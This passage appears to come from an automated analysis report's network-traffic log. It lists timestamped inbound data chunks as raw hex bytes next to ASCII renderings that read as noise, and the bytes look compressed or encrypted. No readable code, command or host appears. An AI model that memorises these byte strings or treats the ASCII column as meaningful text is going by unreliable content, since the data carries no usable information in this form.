2a d6 94 10 eb 28 eb 00 01 31 c9 b2 42 62 16 92 16 05 e6 2b a8 4e a4 d0 68 00 18 75 f5 1b 61 05 52 41 7b 84 af da 67 a0 6d 29 02 24 48 3b ab 7f 38 f5 a8 5e c6 85 75 f1 f8 79 60 95 d5 83 49 e2 e5 48 7e 82 d3 Data Ascii: N]Hb`vt1!6PTWwe#ON-FoiJW<s)l'>rjc%sWJfXEi{^ujr2UYo=UTQXFF:z(GY=_$XF^*(1Bb+NhuaRA{gm)$H;8^uy`IH~
2021-12-14 11:52:59 UTC	101	IN	Data Raw: 48 0c ec 87 f0 01 e8 8b 08 95 fc 34 5a fa 66 d4 da 76 4d 52 94 93 97 54 95 b4 e5 b5 2f 17 5c 66 1e 2e 81 87 23 ec ba 20 31 eb 3d 79 a2 6b 72 38 db be e5 5f d7 9e f7 28 16 9c e3 39 ba 5e 32 5d 49 0b f7 85 ae 7c a8 73 5d aa ad 0b 6f 75 df ed 15 78 cf de fb f8 5f 00 96 eb 59 00 06 1f a1 13 8c c9 c7 97 96 16 99 9b 67 bd 26 79 2b cd b8 c3 06 10 d9 f7 71 31 f2 af 9e 61 c9 db 36 c7 eb 42 32 97 ad 78 20 2c 01 0d f3 1a f8 1f d9 cf 72 61 22 66 fa d4 ef 24 d8 73 1f 5b b4 00 4a 0a d5 29 df 46 8c 93 46 e8 be 73 60 87 cf b3 34 bd bb 9e c8 b0 ad 14 e2 5a 4d 96 05 e1 d1 c3 d4 30 88 e3 f1 5d 92 37 9a 65 24 e9 b7 7c 56 68 d4 1f 69 5a 3b 00 01 30 cd 00 cc 14 49 cd 02 55 7b 97 7e c5 a5 03 e2 e7 10 a4 b0 1d 52 ab d0 ec c5 f8 9b 6c 4c c1 92 ef 22 d4 6d 73 9f 13 af b1 81 48 5d Data Ascii: H4ZfvMRT/\f.# 1=ykr8_(9^2]I\|s]oux_Yg&y+q1a6B2x ,ra"f$s[J)FFs`4ZM0]7e$\|VhiZ;0IU{~RlL"msH]
2021-12-14 11:52:59 UTC	102	IN	Data Raw: 38 6d bf 93 a0 0e 6f f4 f7 89 01 52 46 56 15 dd 90 15 6e c3 34 22 1c 50 cb c7 94 bf 99 2c ff 17 3d 14 17 a0 78 1b a4 68 0a 91 a1 88 96 8f bc fc 03 6a f4 bb 86 ae 37 06 bf bd 39 67 31 6e 47 59 83 5f 0c ce cc b0 b2 fb b5 ce 23 49 62 14 db 6e 7f 8f a5 35 61 2c db 4b ba 9a c9 2c b3 ae 37 d8 7c e4 5e 95 5e 93 82 69 ed b1 82 6c 7f 97 c2 db 4e 73 3b 01 bf db 00 79 fb ef d3 4b ba 4a 9e 97 7c 44 39 ca 68 32 b5 1a 92 a0 cb 2a 05 12 d7 3b 00 84 77 d9 9a 6d 91 f3 ab d1 aa d2 7c 9b 04 f4 34 1b 27 6e 78 4c 7b 05 c7 b3 de 99 5d ef e6 66 49 e6 fa 88 7b da 69 77 c0 1f 9a 19 cc 76 0e b1 87 64 79 a4 20 e1 46 df 1b eb f0 1b 28 dd 49 2e 98 57 c5 28 39 3a 5e 2c 51 5b 9d 0a fd c1 94 bc 5e 45 5a 58 45 45 0e cc 69 f3 bc cd d1 b0 12 90 62 37 1e 11 4c ca 58 8d b6 57 5e 2a da 79 14 Data Ascii: 8moRFVn4"P,=xhj79g1nGY_#Ibn5a,K,7\|^^ilNs;yKJ\|D9h2;wm\|4'nxL{]fI{iwvdy F(I.W(9:^,Q[^EZXEEib7LXW^y
2021-12-14 11:52:59 UTC	103	IN	Data Raw: c5 9f ab e1 bb 1c a6 c4 d5 42 bb 83 70 c4 40 25 d4 a4 3b 26 ce 17 2f b4 9f e5 63 c4 5f e1 d3 40 a1 3b 99 ad eb 76 da 1d 3e ac 57 26 98 fd 29 33 63 f6 14 46 c7 f3 a5 05 ee f9 ca d8 0a e6 1a 00 34 41 28 df 7c 0f 10 ec 19 32 6b fd 19 47 fa 66 d4 da 76 4d 46 c7 17 94 54 9b b4 90 4a 84 17 56 4a 02 47 89 82 23 f9 b5 14 1e 1c 3a 43 b2 6f 87 81 b0 96 73 4b ff 0e 42 47 47 8a f9 5c 00 5b 36 51 40 10 e1 ee 07 6d ac 66 54 45 a9 9f 2a ad af e4 02 12 fb 11 72 bc a5 00 97 ec 53 6d 00 4e 3d 1e 85 e5 8a 02 f0 a4 85 07 64 b3 11 e5 39 eb a1 ac 80 10 d9 fd b5 3e e1 ba ed fc cd c2 c2 ca c5 4e 38 83 68 78 20 2e 2b 6e 6b 10 97 60 c3 dc 7c 30 24 69 3c 3b ea 1c 86 67 6f 8b bf 08 62 63 40 44 88 4c 86 80 89 eb 94 62 65 88 dc 4d 37 91 b7 b6 42 93 ad 14 ee 45 59 85 1a d1 c5 c7 c9 cf Data Ascii: Bp@%;&/c_@;v>W&)3cF4A(\|2kGfvMFTJVJG#:CosKBGG\[6Q@mfTE*rSmN=d9>N8hx .+nk`\|0$i<;gobc@DLbeM7BEY
2021-12-14 11:52:59 UTC	104	IN	Data Raw: e9 78 a7 f9 e5 80 1c c6 b7 c4 22 70 3a 30 03 72 d7 77 8d 81 2b 00 67 ce a3 e9 8c d3 32 d4 bf 15 5b e8 bf 5e d3 e7 9c 96 05 7d df 49 e0 99 d9 99 3c 22 a0 54 6c f7 a4 82 f9 cd 00 90 0e 6c 0a a7 5d 27 69 bc 86 c9 c2 90 f5 dd 86 27 3a 40 57 04 d1 e0 8c 92 c2 12 3d 1b 19 ce bc 8d af 9f 3e 1e 36 02 1f 00 a2 76 04 ac 90 14 aa 51 8a ea 9c 92 97 46 fe 08 44 7d 9b 2d 15 a4 8d 2c 6f 9c 60 b9 58 70 57 0b c9 eb ae ab cd 02 c5 23 58 6a 1a c9 8f 64 5d ae 1e 7c a0 17 6b b6 85 d8 1f bb 2f 26 d0 4b 76 a2 94 78 95 9e 00 52 b7 0c d1 0f d7 d1 dd 44 69 22 10 52 d2 2c 78 fb f3 be 91 ba 66 8b fb b4 3f 20 c1 62 28 b8 5c 80 4e 32 ce e4 04 e8 3a 7e 80 7e c6 91 9f 8c cc a0 c7 bc c3 b9 3d e9 f2 0b 09 3a 05 65 45 7b 10 c9 ba cb e9 eb ac 42 77 4f fd e2 d4 29 22 96 99 d9 14 94 ef cd 4b Data Ascii: x"p:0rw+g2[^}I<"Tll]'i':@W=>6vQFD}-,o`XpW#Xjd]\|k/&KvxRDi"R,xf? b(\N2:~~=:eE{BwO)"K
2021-12-14 11:52:59 UTC	106	IN	Data Raw: 22 0b d0 e6 e0 0b 56 e5 92 4a 3d b9 75 96 05 69 dd 7f 78 88 dd 4b d2 31 89 42 22 d4 20 34 0f 14 c9 31 55 5f f7 c4 45 8b 09 5e 36 62 f1 0a e4 44 2f 52 0a d4 94 80 21 a2 67 02 10 6b 58 af b2 6d b3 1e 8c a8 e1 be 19 bd c0 c4 5b a8 62 6b 16 42 11 d3 ae 40 39 c7 08 27 4d 88 ce e3 76 4b 53 d2 40 af 31 ec 8d 49 69 c6 0a 29 a1 b8 2f ab fe d5 49 41 e7 17 4a dc d1 e8 2f 65 f1 dc cc 76 4a 05 15 2d 56 26 dd 70 10 14 16 07 0f 99 ed 33 47 b8 b7 db db 76 56 47 fc 85 96 45 99 bd 99 db 2c 3b 59 43 15 4b 4c ae a8 ea b1 01 04 e4 24 7b b6 65 fc 9e b9 89 66 a3 d6 b8 54 42 4e 94 fc 2f 7f 73 08 5a 5f 10 8f f7 06 7c ac 66 48 a8 a0 b3 10 a7 cb f1 fd 13 d3 07 f7 86 a2 3e 98 e0 5a 7b 00 02 b2 1f 92 eb c9 81 e1 42 98 b7 74 af 0f 71 2f e9 6d eb 17 11 d9 fd 82 99 f0 be e7 90 ea da 3c Data Ascii: "VJ=uixK1B" 41U_E^6bD/R!gkXm[bkB@9'MvKS@1Ii)/IAJ/evJ-V&p3GvVGE,;YCKL${efTBN/sZ_\|fH>Z{Btq/m<
2021-12-14 11:52:59 UTC	107	IN	Data Raw: 01 b0 4e 44 c8 65 04 94 1f 28 3e 15 e3 fe f1 aa c7 bd 06 21 20 05 99 dc ce 13 b2 ed 3d e3 05 9e ad 6d 99 7a 90 c4 7e 14 90 1d 5c f1 84 81 74 7b ae 69 8f 86 f1 e6 e3 4d 0d 0d 5d dc f8 21 a4 97 50 78 7a a3 ed 83 c1 72 69 b5 db 34 70 3a 37 7d d5 ca 6b 79 93 03 08 0a 1a aa e8 86 da 19 ff af 13 d7 0f a2 4d da cf bb 9f 1a 7b 23 33 c2 93 c8 98 54 07 75 47 63 64 3b 91 f1 cc 07 b0 8e 4e f4 ac 5d 2f 7d b5 5c d5 14 80 fd a6 88 02 29 4c 55 04 dd e8 f9 b6 74 29 e7 95 62 d8 c1 95 d3 8f 3b 01 12 13 6c 0e b2 7e 1f bc 78 7a 16 5d 89 b0 ab 95 82 35 e4 09 40 7b ff 27 07 ac 89 2b 76 87 da 28 02 5c 5f 06 f9 d8 d8 ba c2 11 c9 2a 5f 0d 95 df 71 6f 57 b3 13 a4 0c a2 3e b5 9b cd 08 dc a9 35 d8 5e 6b 36 a8 3c 7b 65 f9 9a bd aa 51 60 8c db f5 76 62 3d 16 9f da 3a 43 f5 c6 e9 73 bb Data Ascii: NDe(>! =mz~\t{iM]!Pxzri4p:7}kyM{#3TuGcd;N]/}\)LUt)b;l~xz]5@{'+v(\_*_qoW>5^k6<{eQ`vb=:Cs
2021-12-14 11:52:59 UTC	108	IN	Data Raw: 53 47 68 66 2e d8 67 ab c6 27 09 33 5b 2c 36 55 23 0b a8 d0 dc 83 1a f5 ef 6e 4c 11 de 9f 50 e0 f1 71 9e 9b 2d 25 5d b7 4a 36 b4 c9 52 cc 6b 85 96 97 07 42 be 15 81 98 84 78 e8 9b 14 c1 ff 85 ac 2f 09 dc f0 e6 8f 66 eb 6c 4a b3 b9 74 f9 0d 7e ca 53 c5 e6 9d b5 d5 25 a1 b1 29 c7 2e 22 93 1b d6 3a aa 4a cf dc 5b bc b6 1a bb 69 d7 21 a1 4f 28 72 e7 c1 9c 9f c9 2e 4c 0c 14 69 c2 0c bc 9f 07 c4 9f a5 f9 8c e4 b1 c0 d3 45 32 9b 6a 3a 40 1d d4 b2 68 8b cf 17 21 9b 98 e2 ed 79 3c 40 c7 68 44 20 82 b8 f8 fb cc 19 21 a0 ba 23 a5 ee 3d 60 9d f3 14 44 61 ca 3a 13 fa e7 f4 65 65 4f 10 28 8a 5e 26 c6 54 0d 2a d0 01 37 bd 11 31 50 fe 0b 57 dc 76 49 50 fb 99 82 7c 32 a2 8a 2f 39 3f a7 44 1d 53 8c 0b 24 e8 b1 0a 03 f6 2f 47 06 6d fc 85 99 25 77 5d dd bc f4 47 4d 96 d9 5d Data Ascii: SGhf.g'3[,6U#nLPq-%]J6RkBx/flJt~S%).":J[i!O(r.LiE2j:@h!y<@hD !#=`Da:eeO(^&T*71PWvIP\|2/9?DS$/Gm%w]GM]
2021-12-14 11:52:59 UTC	109	IN	Data Raw: 04 30 b7 97 2e a0 03 8e e3 e1 10 a4 dc 1b 52 a7 b2 59 56 fa 91 77 4d a7 66 7d 22 de 4f a0 5b 12 a9 d8 24 4e 5b db fa 93 bc 1a c6 d4 37 42 09 5e 90 54 c9 1c e6 51 60 e9 ea b4 70 67 c5 26 37 c6 5f 11 f2 a2 2f 58 61 6b 28 3b 2f 5b d5 6d ff fb b3 e6 98 7d 2f 2b 0e 43 e7 d6 6d 41 28 3d e9 08 cb 78 90 66 8f 42 da 01 25 b5 6d 5a f7 ef 83 7f 7c b5 c1 70 86 f1 e7 8e 61 03 0c 57 04 cf c8 ca 80 39 c2 7f 89 e7 a5 c6 5c a2 b7 db 3c 63 32 30 3f 7a c8 6b 78 80 07 0f 5d b5 a8 e8 80 d7 08 fa be 15 5b f7 a0 4d db e7 c9 9e 1a 71 0b 49 cc 92 a6 9d 3b 9a 61 47 69 e8 a9 91 f1 cd 13 98 11 4f 7f a7 71 2b 73 bf 82 a6 b5 90 f5 db 95 03 29 48 57 15 d9 ff 91 6c c3 3e 88 19 49 d8 5b 94 ae 9f 69 03 16 11 01 00 b3 7e 1b b5 6e 15 9d 6f 80 ba 78 95 f9 3b 09 09 44 68 9a ba 2d ac 8d 3c 74 Data Ascii: 0.RYVwMf}"O[$N[7B^TQ`pg&7_/Xak(;/[m}/+CmA(=xfB%mZ\|paW9\<c20?zkx][MqI;aGiOq+s)HWl>I[i~nox;Dh-<t
2021-12-14 11:52:59 UTC	111	IN	Data Raw: b3 16 f5 92 9f b8 5e 47 36 9d 5e 44 04 a7 fe 68 be c7 b4 b3 0a ff c1 3c 0f 1d 3c bc 4b 8b bc 6b 95 eb ca 96 13 c7 3e ff 19 62 98 c8 9e 40 b6 06 4e c4 0f ce 10 9a 4e b5 df 62 fb 31 5f e0 19 1c 01 7b 79 7f eb 23 06 67 ac ff 23 18 36 51 3b ba 78 23 13 a9 4d 9a 87 02 e1 f9 79 64 b9 de 9f 5a 80 82 59 6e 85 2d 23 4a 21 7d 35 b4 64 46 d8 7f 43 35 97 16 60 ad 38 6a 9a f7 c5 fd 16 19 cd f7 eb 03 29 18 d2 eb 8f 90 49 eb 66 40 18 c7 13 ed 19 62 ce 7d 46 be 8c b9 bd 55 89 5d 27 b3 6a 34 1e 1d c5 3e ac 20 48 c8 4c 9e 7e 06 ba 63 fb 26 d7 59 38 72 02 c0 9c 9f b0 63 49 0c 1e 40 62 18 a8 bd 88 d6 8e ab c5 ad 0f b5 c6 ba 93 bd 9c 60 55 54 09 c0 ac 4b 39 cb 78 ea b1 89 e8 ea 5b d5 4b d3 46 d5 b7 82 be e5 19 b3 19 21 ab a2 36 b2 85 4d 48 6d fd 39 dd 1d d7 2f 01 c2 f4 cd c0 Data Ascii: ^G6^Dh<<Kk>b@NNb1_{y#g#6Q;x#MydZYn-#J!}5dFC5`8j)If@b}FU]'j4> HL~c&Y8rcI@b`UTK9x[KF!6MHm9/
2021-12-14 11:52:59 UTC	112	IN	Data Raw: ae be 08 67 24 c9 46 88 4c a4 9a 9b ef 9e a5 72 91 de b5 27 b8 8f 47 0b 9f bc 1a ce 5d 5c 92 71 86 d4 c3 d9 ed 8a e5 42 97 90 26 92 23 45 f1 d9 88 53 1d ee 37 72 5a 16 01 01 49 cd 00 cc 4f e4 cd 02 59 6e ed 2e aa 66 09 e0 e7 75 46 21 1f 58 bb c7 d2 39 0e 9a 66 46 e0 f7 7d 22 de 4f 0c 5d 12 a9 9f bc 4e 5b d7 fa 67 bd 1a c6 f1 6c 46 66 92 fd ab c3 03 e0 14 5b a7 18 a4 74 70 de 61 aa c6 5f 11 d6 5e 03 49 62 04 98 56 33 50 ba eb c7 4c b8 ce bf 55 3d 24 05 9b c0 ce 54 3d ea 3d ef 6d ed 00 6f 93 5c 90 c5 38 20 c5 56 5c df ca af 73 67 a9 b6 4d e9 3b e4 e1 3c 1c 34 47 ce 88 c9 cf 80 39 c0 63 a2 e7 af ee 4a c4 b7 dd 16 4d 30 30 14 15 b0 6b 73 8a 2f 37 67 b5 a2 fb 8b c0 1b f2 86 44 5a f7 a2 5c dc e5 f6 a9 1b 71 25 27 07 90 c8 96 e1 82 af 50 b3 ff 7f 1c e4 cd 11 99 Data Ascii: g$FLr'G]\qB&#ES7rZIOYn.fuF!X9fF}"O]N[glFf[tpa_^IbV3PLU=$T==mo\8 V\sgM;<4G9cJM00ks/7gDZ\q%'P
2021-12-14 11:52:59 UTC	113	IN	Data Raw: d5 a4 f6 70 8e fa e4 13 10 09 eb 77 61 6a 06 ae 59 d9 17 ec 91 48 09 99 ee e5 9d 77 f1 7a 6d c6 11 8c f8 de a4 1b 9f f1 69 f6 13 2d f0 86 0c 86 58 80 a6 3b d6 43 20 8d 5b f2 d6 29 10 4a 20 a6 4d 67 87 ec be 85 8f 4d 4a 59 32 57 5b 12 36 40 46 b2 dc dd be 65 06 ca 37 18 04 4e c9 40 8b a7 4d 47 12 38 86 39 e2 01 cc 1c 0d cf d7 b6 59 61 01 55 11 05 e1 c6 ac 62 a4 d2 72 70 ae 50 fd cf c0 64 a8 40 7f ed 36 d3 74 a1 d5 32 13 28 5b c5 bb 56 32 08 a0 6a 1b 8f 18 f0 fd 51 7d b8 de 95 45 f0 f6 52 7b 8e 26 3c 5a c4 4c 1a a7 cb 4f cf a9 3c 22 4d 10 9e 27 16 6a 9c 85 72 e0 04 00 ca ff 95 b4 34 31 26 e7 dd 08 3a eb 6e 4b 17 bb 77 f2 33 7b d6 7b 7c ed 82 90 2c 30 a5 50 2e 49 9f 3d 06 ca 0c 29 af 41 eb db 47 94 00 11 a4 47 0f 0b d7 59 3f 53 12 13 94 8f ce a7 63 15 15 68 Data Ascii: pwajYHwzmi-X;C [)J MgMJY2W[6@Fe7N@MG89YaUbrpPd@6t2([V2jQ}ER{&<ZLO<"M'jr41&:nKw3{{\|,0P.I=)AGGY?Sch
2021-12-14 11:52:59 UTC	114	IN	Data Raw: ab 6b 38 60 bf 93 ad 09 8b 0b da b5 0a 38 42 4f 26 99 e0 88 7f c8 3e 20 13 56 f2 3f 95 82 93 2b 06 0c 7e ee 01 b3 78 04 9e 7d 1e 86 4e 82 a5 ad 69 f8 17 f0 00 5c af 87 3e 11 7a 1c eb 64 0d da 79 b8 a2 a0 f3 c0 fb b0 bf c3 00 c6 3c 61 9c 04 f1 7d 74 7b be 59 cd d0 5f ba a4 b3 de 07 b3 3e 3c c7 5f 83 5d b9 40 82 f5 fc 45 b1 84 71 ba 9b 07 50 65 62 3d 1d 4d c5 20 7a f8 ec b9 64 a3 b4 9b d4 ed 37 39 c2 62 2a ad 05 81 ba cd 20 f0 0c e6 cc 7f bd 66 c8 98 62 84 f7 7b 40 d4 2f 62 85 fc ea 06 1c 2e 15 67 46 64 42 3f a4 f4 1f e3 97 99 6b 56 a8 f6 9c 68 cd 62 79 e3 fe 86 cb ef 5d 75 4f fd 6a 7e a3 4b 14 51 d6 93 33 4e b0 28 d7 54 eb e9 96 c1 28 22 34 2e dc ae 5a b7 09 d9 a9 91 bd 4f 4a 46 13 a2 45 22 c1 79 ce be cd db b9 3b ec c0 37 0f 10 4c c3 b5 8a 9a 40 73 85 d9 Data Ascii: k8`8BO&> V?+~x}Ni\>zdy<a}t{Y_><_]@EqPeb=M zd79b* fb{@/b.gFdB?kVhby]uOj~KQ3N(T("4.ZOJFE"y;7L@s
2021-12-14 11:52:59 UTC	115	IN	Data Raw: a4 94 c7 9f da ed a4 0a b5 c0 d5 53 bd b4 7d 3a 41 03 c2 b1 3d 6c ce 17 2f b1 9f 9f ab 72 30 4c d1 56 d6 63 83 be eb 74 c8 64 69 a0 a9 23 b6 91 63 49 6d f3 10 2d 18 d9 3e 0d ec f6 a1 8f 64 4f 1e 02 30 5a 5b 86 79 0f 05 ea 04 58 dd fd 35 54 97 21 db db 7c 25 72 ef 8d 96 54 91 a2 aa 65 76 3f c7 40 1d 5f 2d fb 60 e9 b1 0f 15 e0 40 2c a4 6d f8 98 6b 81 a1 d0 fc 94 40 46 30 d9 e2 33 ad 71 36 5b 5f 09 c2 ef 07 fe a9 79 5a 4c a8 b3 10 b9 c7 ef 3b 7e fe 0b ff 97 b4 05 8c 1f 5b 57 0e 1c da 50 93 fa c5 9c 82 fa 98 9b 69 70 06 62 23 f8 bb d2 2c 07 27 f6 86 32 ea ad e8 ed d8 de 23 c1 17 40 03 6f 66 79 20 28 56 44 f6 12 93 68 a2 89 79 30 31 65 32 c3 c3 08 88 65 1e 87 bc 74 21 0d dd 42 9e 6e 86 99 9a c4 e9 35 60 97 cb ba 30 6b b0 a6 c7 92 ad 1e e1 53 97 85 1a d3 d6 d4 Data Ascii: S}:A=l/r0LVctdi#cIm->dO0Z[yX5T!\|%rTev?@_-`@,mk@F03q6[_yZL;~[WPipb#,'2#@ofy (VDhy01e2et!Bn5`0kS
2021-12-14 11:52:59 UTC	117	IN	Data Raw: 9c 2c e5 78 b2 ea b8 38 1c ea b9 c3 3c 18 78 31 12 7e db 62 60 84 19 1c 68 b5 b9 e5 93 da f6 fb 92 1f 4a f2 b5 9b c8 e2 92 90 09 7c 21 59 c1 8d c3 62 3a b6 7e 7f 8d e8 a9 91 ee c1 02 95 11 5e f9 b9 68 d5 6a 93 92 a4 6d d5 f4 db 9d 16 69 72 55 15 d9 e0 89 7f ce 3e 20 15 56 cb 3f 95 82 92 2b 09 01 81 2e dc 4d 81 e4 aa 7a 06 8b 5f 98 b7 95 69 f8 17 f2 0b 3f 30 85 37 02 22 3a 27 b1 94 b7 50 8f d1 74 0c df db ae ad d0 1c cd 32 44 7d 0c 23 70 49 40 a6 62 32 2f a0 41 b3 ee df 0c b3 34 21 d0 40 55 dd 97 54 83 8c 8b 43 b1 82 67 74 98 c5 f5 ed 62 3d 16 69 80 2c 69 f9 83 75 6d bb 40 96 e7 ee 57 34 c0 73 21 b9 04 6c b0 e1 3b ea 17 ea 3b 4f 51 69 c0 8d 6c 8d f1 a0 cd 45 d5 4f 8f f2 81 0a 0f 25 0e 7c 50 68 0c c1 b4 d5 08 e5 7e 4e 4a 43 ef dc 2d 68 dc 69 79 d6 13 8a e7 Data Ascii: ,x8<x1~b`hJ\|!Yb:~^hjmirU> V?+.Mz_i?07":'Pt2D}#pI@b2/A4!@UTCgtb=i,ium@W4s!l;;OQilEO%\|Ph~NJC-hiy
2021-12-14 11:52:59 UTC	118	IN	Data Raw: 85 bf 2f 77 ce e4 f1 09 63 eb 6c 4b 02 98 72 ed 34 68 dd 7b c5 e6 9d ae c4 3a a2 46 2d c0 3f ca 1f 30 d4 22 a0 5e dc de b2 95 3d 18 ac 68 f1 0d e3 b6 3d 76 08 ee 9e b2 3c a1 30 47 15 68 d2 77 bf b5 a4 ce b5 99 f2 bc 87 9e c0 d5 52 3f d0 6b 3a 45 23 de b5 70 2d cf b0 2b b3 89 19 ed 73 21 5e c0 45 80 67 82 af ea 61 35 18 0d a2 b1 34 b1 ea 3a 4d 74 09 15 6e c6 cf 14 1d fd f6 dc d7 60 57 e4 01 12 50 24 a3 b1 0f 01 e2 1e 7e 83 d2 2f 49 eb 18 da ca 73 5f af ee a1 95 43 82 a7 8a 34 28 0d a8 41 31 57 b1 84 08 53 b3 64 de e2 3b 65 c9 4e fc 8f b1 96 77 5d d7 d4 1b 64 4d 9c e3 33 a9 5b c6 64 06 32 63 ea 07 76 1f 6e 8c 36 83 b3 01 ae df fc 04 9c 48 1c 25 84 a1 0d bd c3 58 72 07 c6 b9 78 60 fa c1 94 f5 bb 90 93 4d a9 0e 79 30 d5 59 c1 29 1a f1 14 a8 31 f8 22 e4 fa 1f Data Ascii: /wclKr4h{:F-?0"^=h=v<0GhwR?k:E#p-+s!^Ega54:Mtn`WP$~/Is_C4(A1WSd;eNw]dM3[d2cvn6H%Xrx`My0Y)1"
2021-12-14 11:52:59 UTC	119	IN	Data Raw: d7 5d 1b dc 36 21 59 67 0e 8d 3e 2d 79 a7 e4 fe fd 91 ea bf 7d 25 52 88 9c cd c1 6f 27 fe 34 c1 20 f4 01 69 f6 f7 9d cc 16 19 c7 42 50 2a d4 a7 73 6d 8c fe 4a 86 fb f7 e8 20 2b 2f 58 d8 e1 52 44 81 3f ee 17 3b e7 a5 cc 11 ee fd da 3e 69 23 39 04 52 ec 6e 73 86 68 85 64 b5 ae 87 14 d7 08 f0 b5 04 5f ff cd ba da e7 8b 93 0b 76 35 60 23 96 c8 9a 2c 17 70 47 69 e9 ba 8f e0 d3 07 b0 34 4a f4 a0 d3 3a 75 ab 96 b2 3e 32 f5 db 93 12 2e 5c 7f fa dd ff 95 7b 4e 39 31 18 48 cb de 85 b1 89 12 27 13 11 11 a2 a2 61 0f a1 7a 3d 25 5f 89 b0 a5 d7 fb 3b ef 21 f0 79 84 3d 3f 61 8c 3d 67 8a 79 6f 9a 5f 5f 0a c8 57 a4 b4 c3 10 de 03 58 42 13 cb fd 5a 71 a4 18 d8 3f 80 51 af 8e e5 af b3 2f 3d cc 7c be 5f 95 52 92 17 01 44 b1 83 75 41 9d f0 cb 58 ee 02 1c 41 db 8e 78 d2 f8 bc Data Ascii: ]6!Yg>-y}%Ro'4 iBP*smJ +/XRD?;>i#9Rnshd_v5`#,pGi4J:u>2.\{N91H'az=%_;!y=?a=gyo__WXBZq?Q/=\|_RDuAXAx
2021-12-14 11:52:59 UTC	120	IN	Data Raw: 09 2f 42 65 69 fc b5 c9 43 bd c2 bf 09 13 55 2d 26 6b 07 1c 81 d5 cd 87 04 c7 e8 5d 72 29 f2 94 4b c5 f3 c3 53 8e 2d 23 41 29 5c 27 90 df d6 f4 5d bc 17 80 9d 60 bb 3d 6a 96 54 6c ff 16 08 e9 eb 84 bf 21 30 ef e7 f1 09 3d f9 6c 4b 0a 28 3c ec 19 6c a3 37 6c e6 99 b5 0f c7 8b 5d 2d e2 00 03 1e 1c dc 29 b9 4a d1 e0 74 94 11 10 66 81 f3 0a fb 4a 14 7d 0f c5 9a b1 fb a3 4b 06 3c 59 d6 18 a2 8e 6d c6 9f af fb 29 21 b5 c0 d4 40 a4 9e 42 1d 44 09 c6 8e 64 28 cf 1d 58 40 88 e2 eb 60 24 59 c7 2f 5a 25 82 b8 80 90 c9 19 2b b2 8c 1f ba eb 2b 48 7f d2 3c a5 c1 db 34 8b c4 f3 dc dd 76 53 0b 1c 2a 76 0e c8 78 09 17 65 01 23 95 fd 21 44 ec 35 79 db 76 43 79 c7 88 96 52 87 8a 62 27 2d 1d 47 5c 09 7d b2 82 23 ee a7 86 10 e2 3b 6e b1 79 e8 a7 12 96 77 57 ff bd 45 47 4b 8a Data Ascii: /BeiCU-&k]r)KS-#A)\']`=jTl!0=lK(<l7l]-)JtfJ}K<Ym)!@BDd(X@`$Y/Z%++H<4vS*vxe#!D5yvCyRb'-G\}#;nywWEGK
2021-12-14 11:52:59 UTC	122	IN	Data Raw: dd cf 13 48 1e 9f d0 ab 40 18 f3 e4 32 a7 26 1f 54 89 f9 c4 56 f0 b3 57 40 c8 e6 45 47 d5 67 5b 40 19 bc a0 92 5d 4c ce b2 e1 bc 36 c6 ed 64 59 df 4b f5 b4 e1 0f fb 0e 5d df f3 bb 8a 77 e4 67 ac ca 30 e7 db 59 2d 4e 08 d6 9c 39 25 3e 46 e0 fe fd ae a1 6d 7f 2f 2b 6a 61 cc c7 7a 39 80 ef eb 02 fb 6e 91 98 70 9a df 1f 2b df 45 4d f7 ff b8 6c 63 5a b5 67 96 d9 ca e4 36 05 7f da d9 e7 37 dd 87 20 e7 6b b4 e7 b4 d1 02 d1 49 da 12 6e 23 34 3a e8 c9 6b 79 ad 93 10 7d a6 bf e8 9d c0 11 04 bf 39 52 89 31 4d db ed 81 84 09 66 21 59 db 8d ea 62 3a b6 7b 56 79 e0 c6 b9 f3 cd 17 87 32 5c e3 a6 60 3c 71 41 83 8a 1c ef 66 db 99 09 3a 4c 4c 06 ce ff 82 7b dc 2b cf 19 65 f8 d0 9d bf 95 22 d7 79 fd 15 00 b9 11 91 b4 6e 1f 9e 30 02 bb 8d 9d 96 b7 e4 09 4e 74 9b 21 15 bb 8d Data Ascii: H@2&TVW@EGg[@]L6dYK]wg0Y-N9%>Fm/+jaz9np+EMlcZg67 kIn#4:ky}9R1Mf!Yb:{Vy2\`<qAf:LL{+e"yn0Nt!
2021-12-14 11:52:59 UTC	123	IN	Data Raw: ae 5a b7 05 ee ab 8b c3 12 40 59 27 4d 57 26 d4 43 6a b8 de d7 b7 0d f6 e3 5e 1f 1b 59 b5 bc 8a b6 40 4b 38 d7 8a 7a 17 38 ee 19 1b a0 1a 9c 4a 60 6e b8 1b 1a ed 2f c2 9c b7 d5 7b 91 e5 58 e5 1f 0d 64 81 43 7f e1 46 26 66 aa d3 30 17 26 40 54 46 7b 23 0d bf 1d 1f 85 0e eb 96 85 65 b9 d8 87 35 35 e7 59 71 f0 d3 22 4b 3c 5e 38 a5 c6 38 94 7e ad 31 86 08 60 b6 3f 6a 9a 97 75 8c 34 11 c1 f9 97 af 3a 08 d0 89 d9 01 49 ed 7d 5b 00 a4 58 c0 1c 68 db 53 43 e4 9d b9 fa da 8b 5d 27 a8 0c 36 1e 1a c7 2a ba 55 f3 e5 49 94 17 32 95 61 f1 0c d3 a3 3e 5a 00 aa ba 9b df a5 5a 1c 17 07 fc 1a a8 b1 a2 d5 8f c0 f5 a5 0a bf 1e da 76 97 ab 6a 3a 4b 1a d4 8e 78 28 cf 1d f5 b3 98 e8 fa a5 23 42 c2 4a ba 33 bc cb 11 89 34 08 34 b6 7f 34 a1 fb 3e 59 7b 79 a3 7d 28 26 c1 f8 e8 d9 Data Ascii: Z@Y'MW&Cj^Y@K8z8J`n/{XdCF&f0&@TF{#e55Yq"K<^88~1`?ju4:I}[XhSC]'6*UI2a>ZZvj:Kx(#BJ3444>Y{y}(&
2021-12-14 11:52:59 UTC	124	IN	Data Raw: 65 14 8f 6e 1a 66 0c c6 6e 9c 46 8c 93 b2 d8 95 73 6b e3 dd b3 36 a6 43 95 d5 93 d9 0c e2 5a 56 9d 19 db 0a d3 f6 19 bf e3 2d 57 9f 32 92 1d 67 e7 b6 76 8c 1d ee 35 69 1a 0a 0b 29 1e cf 00 ca 67 ca cf 02 46 00 95 2e b3 6d 02 e2 f1 1a 8c 23 05 52 a1 dc 9e 54 04 8e 2a 40 c8 ee 7e 21 a9 1c 5a 5f 16 ad b3 ef 30 5a d1 91 35 bd 09 fc f8 6e aa 09 58 ff a3 c8 1c fd 0c b2 dd a1 a5 74 74 ca 37 88 c7 5f 1f a7 27 2a 58 63 06 4e 74 2f 51 b8 c9 ea fb b9 c4 97 7e 2e 21 0f e0 b0 c6 7c 2a ec 29 17 03 e7 ff 6e 93 76 b0 e1 12 37 4e e1 27 77 ef af 77 6f 